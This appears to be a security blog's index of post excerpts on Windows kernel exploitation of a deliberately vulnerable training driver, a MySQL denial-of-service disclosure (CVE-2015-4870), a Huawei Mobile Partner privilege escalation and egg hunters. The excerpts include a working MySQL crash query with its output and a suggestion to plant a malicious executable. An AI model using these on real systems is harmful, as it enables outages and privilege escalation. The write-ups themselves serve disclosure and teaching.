Windows Kernel Exploitation – Null Pointer Dereference

Today I’m sharing on exploiting the null pointer dereference vulnerability present in the HackSysExtreme Vulnerable Driver.

The Vulnerability

You can view the source from here.

NTSTATUS TriggerNullPointerDereference(IN PVOID UserBuffer) {
    ULONG UserValue = 0;
    ULONG MagicValue = 0xBAD0B0B0;
    NTSTATUS Status = STATUS_SUCCESS;
    PNULL_POINTER_DEREFERENCE NullPointerDereference = NULL;

    PAGED_CODE();

    __try {
        // Verify if the buffer resides in user mode
        ProbeForRead(UserBuffer,
                     sizeof(NULL_POINTER_DEREFERENCE),
                     (ULONG)__alignof(NULL_POINTER_DEREFERENCE));

        // Allocate Pool chunk
        NullPointerDereference = (PNULL_POINTER_DEREFERENCE)
                                  ExAllocatePoolWithTag(NonPagedPool,
                                                        sizeof(NULL_POINTER_DEREFERENCE),
                                                        (ULONG)POOL_TAG);

        if (!NullPointerDereference) {
            // Unable to allocate Pool chunk
            DbgPrint("[-] Unable to allocate Pool chunk\n");

            Status = STATUS_NO_MEMORY;
            return Status;
        }
        else {
            DbgPrint("[+] Pool Tag: %s\n", STRINGIFY(POOL_TAG));
            DbgPrint("[+] Pool Type: %s\n", STRINGIFY(NonPagedPool));
            DbgPrint("[+] Pool Size: 0x%X\n", sizeof(NULL_POINTER_DEREFERENCE));
            DbgPrint("[+] Pool Chunk: 0x%p\n", NullPointerDereference);
        }

        // Get the value from user mode
        UserValue = *(PULONG)UserBuffer;

        DbgPrint("[+] UserValue: 0x%p\n", UserValue);
        DbgPrint("[+] NullPointerDereference: 0x%p\n", NullPointerDereference);

        // Validate the magic value
        if (UserValue == MagicValue) {
            NullPointerDereference->Value = UserValue;
            NullPointerDereference->Callback = &NullPointerDereferenceObjectCallback;

            DbgPrint("[+] NullPointerDereference->Value: 0x%p\n", NullPointerDereference->Value);
            DbgPrint("[+] NullPointerDereference->Callback: 0x%p\n", NullPointerDereference->Callback);
        }
        else {
            DbgPrint("[+] Freeing NullPointerDereference Object\n");
            DbgPrint("[+] Pool Tag: %s\n", STRINGIFY(POOL_TAG));
            DbgPrint("[+] Pool Chunk: 0x%p\n", NullPointerDereference);

            // Free the allocated Pool chunk
            ExFreePoolWithTag((PVOID)NullPointerDereference, (ULONG)POOL_TAG);

            // Set to NULL to avoid dangling pointer
            NullPointerDereference = NULL;
        }

#ifdef SECURE
        // Secure Note: This is secure because the developer is checking if
        // 'NullPointerDereference' is not NULL before calling the callback function
        if (NullPointerDereference) {
            NullPointerDereference->Callback();
        }
#else
        DbgPrint("[+] Triggering Null Pointer Dereference\n");

        // Vulnerability Note: This is a vanilla Null Pointer Dereference vulnerability
        // because the developer is not validating if 'NullPointerDereference' is NULL
        // before calling the callback function
        NullPointerDereference->Callback();
#endif
    }
    __except (EXCEPTION_EXECUTE_HANDLER) {
        Status = GetExceptionCode();
        DbgPrint("[-] Exception Code: 0x%X\n", Status);
    }

    return Status;
}

As usual, everything is clearly explained in the source. At line 42 the ‘userValue’ is compared with the value ‘0xBAD0B0B0’ and if it fails at line 58 the ‘NullPointerDereference’ value is set to NULL and at line 73 the value ‘NullPointerDereference’ is not validated whether it’s NULL before calling the callback function.

Let’s disassemble and see it closely. As you can see, if the provided ‘MagicValue’ is wrong the value of ‘NullPointerDereference’ is set to NULL to avoid the dangling pointer.
Continue reading

Advertisements

Windows Kernel Exploitation – Arbitrary Overwrite

Today I’m sharing what I learned on developing an exploit for the arbitrary overwrite vulnerability present in the HackSysExtreme Vulnerable Driver. This is also known as the “write-what-where” vulnerability. You can refer to my previous post on exploiting the stack overflow vulnerability and the analysis of the shellcode.

The Vulnerability

You can check the source from here

NTSTATUS TriggerArbitraryOverwrite(IN PWRITE_WHAT_WHERE UserWriteWhatWhere) {
    PULONG What = NULL;
    PULONG Where = NULL;
    NTSTATUS Status = STATUS_SUCCESS;

    PAGED_CODE();

    __try {
        // Verify if the buffer resides in user mode
        ProbeForRead((PVOID)UserWriteWhatWhere,
                     sizeof(WRITE_WHAT_WHERE),
                     (ULONG)__alignof(WRITE_WHAT_WHERE));

        What = UserWriteWhatWhere->What;
        Where = UserWriteWhatWhere->Where;

        DbgPrint("[+] UserWriteWhatWhere: 0x%p\n", UserWriteWhatWhere);
        DbgPrint("[+] WRITE_WHAT_WHERE Size: 0x%X\n", sizeof(WRITE_WHAT_WHERE));
        DbgPrint("[+] UserWriteWhatWhere->What: 0x%p\n", What);
        DbgPrint("[+] UserWriteWhatWhere->Where: 0x%p\n", Where);

#ifdef SECURE
        // Secure Note: This is secure because the developer is properly validating if address
        // pointed by 'Where' and 'What' value resides in User mode by calling ProbeForRead()
        // routine before performing the write operation
        ProbeForRead((PVOID)Where, sizeof(PULONG), (ULONG)__alignof(PULONG));
        ProbeForRead((PVOID)What, sizeof(PULONG), (ULONG)__alignof(PULONG));

        *(Where) = *(What);
#else
        DbgPrint("[+] Triggering Arbitrary Overwrite\n");

        // Vulnerability Note: This is a vanilla Arbitrary Memory Overwrite vulnerability
        // because the developer is writing the value pointed by 'What' to memory location
        // pointed by 'Where' without properly validating if the values pointed by 'Where'
        // and 'What' resides in User mode
        *(Where) = *(What);
#endif
    }
    __except (EXCEPTION_EXECUTE_HANDLER) {
        Status = GetExceptionCode();
        DbgPrint("[-] Exception Code: 0x%X\n", Status);
    }

    return Status;
}

Everything is well explained in the source code. Basically the ‘where’ and ‘what’ pointers are not validated whether they are located in userland. Due to this we can overwrite an arbitrary kernel address with an arbitrary value.
Continue reading

Windows Kernel Exploitation: Stack Overflow

Introduction

This post is on exploiting a stack based buffer overflow in the HackSysExtremeVulnerableDriver.
There’s lot of background theory required to understand types of Windows drivers, developing drivers, debugging drivers, etc. I will only focus on developing the exploit while explaining some internal structures briefly. I would assume you have experience with assembly, C, debugging in the userland.
This driver is a kernel driver. A driver is typically used to get our code into the kernel. An unhandled exception will cause the famous BSOD. I will be using Windows 7 32-bit for this since it doesn’t support SMEP (Supervisor Mode Execution Prevention) or SMAP (Supervisor Mode Access Prevention). In simple words, I would say that when SMEP is enabled the CPU will generate a fault whenever the ring0 tries to execute code from a page marked with the user bit. Basically, due to this being not enabled, we can map our shellcode to steal the ‘System’ token. Check the Shellcode Analysis part for the analysis. Exploiting this vulnerability on a 64-bit system is different.
You can use the OSR Driver Loader to load the driver into the system.
If you want to debug the machine itself using windbg you can use VirtualKD or LiveKD

You can add a new serial connection using VirtualBox or VMware, so you can debug the guest system via windbg. I will be using a serial connection from VMware.
For kernel data structures refer to this. I have used it mostly to refer the structures.
After you have registered the driver you should see this in ‘msinfo32’.

If you check the loaded modules in the ‘System’ process you should see our kernel driver ‘HEVD.sys’.


Continue reading

MySQL DoS in the Procedure Analyse Function – CVE-2015-4870

This is a crash I found in MySQL versions up to 5.5.45. In the function procedure analyse() I found this crash while passing a sub query.

Syntax:

 
SELECT * FROM `table_name` PROCEDURE ANALYSE((SELECT*FROM(SELECT 1)x),1);

So an Example POC would be:

 
select * from information_schema.tables procedure analyse((select*from(select 1)x),1);
 
---------------------------------------------------------------------------------------------------------------
mysql> select * from information_schema.tables procedure analyse((select*from(select 1)x),1);
ERROR 2013 (HY000): Lost connection to MySQL server during query
mysql>
mysql> select 1;
ERROR 2006 (HY000): MySQL server has gone away
No connection. Trying to reconnect...
ERROR 2003 (HY000): Can't connect to MySQL server on 'localhost' (10061)
ERROR:
Can't connect to the server

mysql>
---------------------------------------------------------------------------------------------------------------


Continue reading

Escalating Local Privileges Using Mobile Partner

Mobile Partner is a very popular software that ships with Huawei internet dongles. Recently I noticed the fact that the “Mobile Partner” directory and all subdirectories, files by default has full permissions granted the Users group. This means that any User in your system can plant a malicious executable and escalate privileges when the Administrator runs Mobile Partner. Why not bind the exe using msfpayload or msfvenom? 😉

 Proof of Concept

By default in my dongle I had Mobile Partner 11.302.09.00.03 and if you are using versions below you might find out that this folder and it’s contents has been granted full permissions not only to the Users group but also to Everyone which means any random user can plant anything inside this directory.

C:\Program Files (x86)>cacls "Mobile Partner"
C:\Program Files (x86)\Mobile Partner Everyone:(OI)(CI)F
                                      BUILTIN\Users:(OI)(CI)F
                                      NT SERVICE\TrustedInstaller:(ID)F
                                      NT SERVICE\TrustedInstaller:(CI)(IO)(ID)F

                                      NT AUTHORITY\SYSTEM:(ID)F
                                      NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(ID)F
                                      BUILTIN\Administrators:(ID)F
                                      BUILTIN\Administrators:(OI)(CI)(IO)(ID)F
                                      CREATOR OWNER:(OI)(CI)(IO)(ID)F
                                      APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(ID)R
                                      APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(OI)(CI)(IO)(ID)(special access:)

                             GENERIC_READ

                             GENERIC_EXECUTE

C:\Program Files>cd "Mobile Partner"

C:\Program Files (x86)\Mobile Partner>cacls "Mobile Partner.exe"
C:\Program Files (x86)\Mobile Partner\Mobile Partner.exe Everyone:F
                                                         BUILTIN\Users:F
                                                         NT AUTHORITY\SYSTEM:(ID)F
                                                         BUILTIN\Administrators:(ID)F
                                                         APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(ID)R

Continue reading

Egg Hunting Fun

In this vacation I thought of learning to use egg hunters in exploit development. This is just a small write up just after successful exploitation of my meterpreter reverse_tcp shellcode. This is the original exploit which was published in 2010 http://www.exploit-db.com/exploits/15834/. I wanted to implement a egg hunter code to search our shellcode with our tag throughout the heap, stack, etc. Egg hunters are used when we have a limited buffer space.

Download the vulnerable Kalbri server: http://www.exploit-db.com/wp-content/themes/exploit/applications/4d4e15b98e105facf94e4fd6a1f9eb78-Kolibri-2.0-win.zip

I assume you have a good knowledge on developing stack based buffer overflow exploits, about registers, little-endianness,etc which is the very basics.

I developed this exploit under Windows XP SP2 using the USER32.dll which is a operating system dll to find a jump to esp (JMP ESP) command. This application doesn’t use any dlls so this is a platform dependent exploit.

As I mentioned earlier this is very brief  write up.  The offset is at 515 bytes . Our plan is to overwrite the EIP register with our JMP ESP address and we want jump back 60 bytes backwards to the starting point of our hunter so that it would be executed. Then it would search everywhere inside the memory to find the tag and execute our shellcode. Opcode for jmp is EB and 60 bytes back means -60 is C4 so the shellcode would be \xeb\xc4.

Continue reading